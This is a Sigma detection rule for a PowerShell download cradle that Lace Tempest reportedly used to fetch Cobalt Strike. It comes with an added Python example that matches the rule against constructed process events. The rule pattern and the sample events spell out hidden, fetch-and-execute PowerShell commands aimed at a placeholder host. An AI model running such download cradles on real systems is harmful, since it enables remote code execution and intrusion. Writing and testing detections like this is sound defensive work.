Lace Tempest Cobalt Strike Download
Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
Sigma rule
```yaml
title: Lace Tempest Cobalt Strike Download
id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d
status: test
description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
references:
    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-09
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '-nop -w hidden -c IEX ((new-object net.webclient).downloadstring('
            - "/a')"
    condition: selection
falsepositives:
    - Unlikely
level: high
```
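To show what the `CommandLine|contains|all` selection actually evaluates, here is an added Python example (not part of the rule or the SigmaHQ project) that applies the rule's two substrings to a few constructed process-creation events; the host name in the sample command lines is a placeholder, and Sigma's default case-insensitive string matching is assumed.

```python
"""Apply the rule's CommandLine|contains|all selection to sample events (added example)."""
from typing import Iterable

# The two substrings listed under CommandLine|contains|all in the rule above.
RULE_SUBSTRINGS = (
    "-nop -w hidden -c IEX ((new-object net.webclient).downloadstring(",
    "/a')",
)


def selection_matches(command_line: str) -> bool:
    """contains|all: every listed substring must occur in the field.

    Sigma string matching is case-insensitive by default, so both sides are lowered.
    """
    haystack = command_line.lower()
    return all(sub.lower() in haystack for sub in RULE_SUBSTRINGS)


def evaluate(events: Iterable[dict]) -> list:
    """Return the events that satisfy the rule's logsource and selection."""
    hits = []
    for event in events:
        # logsource: category process_creation, product windows
        if event.get("category") != "process_creation" or event.get("product") != "windows":
            continue
        if selection_matches(event.get("CommandLine", "")):
            hits.append(event)
    return hits


# Constructed sample telemetry, not real events; placeholder.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"category": "process_creation", "product": "windows",
     "CommandLine": "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient)"
                    ".downloadstring('http://placeholder.invalid/a'))"},            # both substrings: hit
    {"category": "process_creation", "product": "windows",
     "CommandLine": "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient)"
                    ".downloadstring('http://placeholder.invalid/update.ps1'))"},   # lacks "/a')": no hit
    {"category": "process_creation", "product": "windows",
     "CommandLine": "powershell.exe -Command Get-Process"},                         # benign: no hit
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print("ALERT level=high Lace Tempest Cobalt Strike Download:", hit["CommandLine"])
```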
Related rules
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
- Lace Tempest File Indicators
- Lace Tempest Malware Loader Execution
- Lace Tempest PowerShell Evidence Eraser